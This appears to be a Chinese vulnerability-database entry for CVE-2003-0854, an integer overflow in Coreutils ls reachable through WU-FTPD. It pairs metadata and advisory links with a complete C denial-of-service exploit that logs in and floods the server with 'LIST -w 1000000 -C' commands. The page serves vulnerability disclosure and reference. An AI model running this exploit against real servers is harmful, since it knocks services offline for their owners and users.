Coreutils ls程序宽度参数整数溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107562 漏洞类型 边界条件错误
发布时间 2003-10-31 更新时间 2006-09-20
CVE编号 CVE-2003-0854 CNNVD-ID CNNVD-200311-050
漏洞平台 Linux CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/115
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200311-050
|漏洞详情
Coreutils'ls'是一款用户显示文件和目录信息的工具。Coreutils'ls'在处理宽度和列显示命令行参数时缺少正确的边界检查,本地或者远程攻击者可以利用这个漏洞进行整数溢出攻击,可导致应用程序崩溃。提交超长的参数"-wX-C"(X为任意超大值)给Coreutils'ls'程序,会分配一块很大的内存,出现整数溢出问题,远程应用程序允许用户调用这个'ls'并没有提供参数过滤,就可能导致应用程序崩溃,如Wu-ftpdFTP服务程序存在此问题。
|漏洞EXP
/*
*     (c) Rosiello Security
*
* Copyright Rosiello Security 2003
*   All Rights reserved.
*
* Tested on Red Hat 9.0
*
* Author: Angelo Rosiello
* Mail  : angelo rosiello org
* This software is only for educational purpose.
* Do not use it against machines different from yours.
* Respect law.
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>

void addr_initialize( );
void usage( );

int main( int argc, char **argv )
{
	int i, sd, PORT, loop, error;
	char user[30], password[30], ch;
	struct sockaddr_in server_addr;

        fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
        fprintf( stdout, "http://www.rosiello.org\n" );
        fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );

	if( argc != 6 ) usage( argv[0] );

	if( strlen( argv[3] ) > 20 ) exit( 0 );
	if( strlen( argv[4] ) > 20 ) exit( 0 );

	sprintf( user, "USER %s\n", argv[3] );
	sprintf( password, "PASS %s\n", argv[4] );

	PORT = atoi( argv[2] );
	loop = atoi( argv[5] );

	addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
	sd = socket( AF_INET, SOCK_STREAM, 0 );

  	error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
	if( error != 0 )
	{
		perror( "Something wrong with the connection" );
		exit( 0 );
	}

	while ( ch != '\n' )
        {
                recv( sd, &ch, 1, 0);
                printf("%c", ch );
        }

	ch = '\0';

	printf( "Connection executed, now waiting to log in...\n" );

	printf( "%s", user );

	send( sd, user, strlen( user ), 0 );
	while ( ch != '\n' )
	{
		recv( sd, &ch, 1, 0);
		printf("%c", ch );
	}
	printf( "%s", password );

	ch = '\0';

 	send( sd, password, strlen( password ), 0 );
        while ( ch != '\n' )
        {
                recv( sd, &ch, 1, 0);
                printf("%c", ch );
        }

	printf( "Sending the DoS query\n" );
	for( i=0; i<loop; i++ )
	{
		write( sd, "LIST -w 1000000 -C\n", 19 );
	}
	printf( "All done\n" );
	close( sd );
	return 0;
}

void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
     	address -> sin_family = AF_INET;
     	address -> sin_port = htons((u_short)port);
     	address -> sin_addr.s_addr = IPaddr;
}

void usage( char *program )
{
	fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", program);
  	exit(0);
}


// milw0rm.com [2003-10-31]
|参考资料

来源:TURBO
名称:TLSA-2003-60
链接:http://www.turbolinux.com/security/TLSA-2003-60.txt
来源:IMMUNIX
名称:IMNX-2003-7+-026-01
链接:http://www.securityfocus.com/advisories/6014
来源:REDHAT
名称:RHSA-2003:310
链接:http://www.redhat.com/support/errata/RHSA-2003-310.html
来源:REDHAT
名称:RHSA-2003:309
链接:http://www.redhat.com/support/errata/RHSA-2003-309.html
来源:www.guninski.com
链接:http://www.guninski.com/binls.html
来源:DEBIAN
名称:DSA-705
链接:http://www.debian.org/security/2005/dsa-705
来源:support.avaya.com
链接:http://support.avaya.com/elmodocs2/security/ASA-2005-213.pdf
来源:SECUNIA
名称:17069
链接:http://secunia.com/advisories/17069
来源:SECUNIA
名称:10126
链接:http://secunia.com/advisories/10126
来源:FULLDISC
名称:20031022Funwith/bin/ls,yetstilllsbetterthanwindows
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/012548.html
来源:CONECTIVA
名称:CLA-2003:771
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000771
来源:CONECTIVA
名称:CLA-2003:768
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=0007